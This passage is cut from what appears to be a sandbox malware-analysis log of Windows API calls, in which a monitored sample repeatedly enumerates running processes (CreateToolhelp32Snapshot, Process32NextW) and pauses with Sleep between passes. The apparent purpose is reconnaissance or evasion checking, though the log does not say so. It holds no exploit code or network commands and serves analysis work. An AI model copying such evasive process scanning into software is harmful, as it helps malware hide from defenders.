Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0132.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0132.203] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0132.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0132.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0132.212] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0132.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0132.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0132.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0132.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0132.286] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0132.287] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0132.288] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0132.289] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0132.290] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0132.291] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0132.292] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0132.294] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0132.295] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0132.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0132.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0132.298] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0132.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0132.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0132.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0132.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0132.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0132.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0132.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0132.308] CloseHandle (hObject=0xbc) returned 1 [0132.308] Sleep (dwMilliseconds=0x12c) [0132.734] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0132.739] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.740] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0132.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0132.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0132.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0132.744] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0132.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0132.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0132.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.749] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0132.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0132.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.755] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0132.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0132.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0132.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0132.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0132.763] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0132.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0132.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0132.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0132.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0132.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0132.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0132.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0132.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0132.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0132.774] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0132.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0132.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 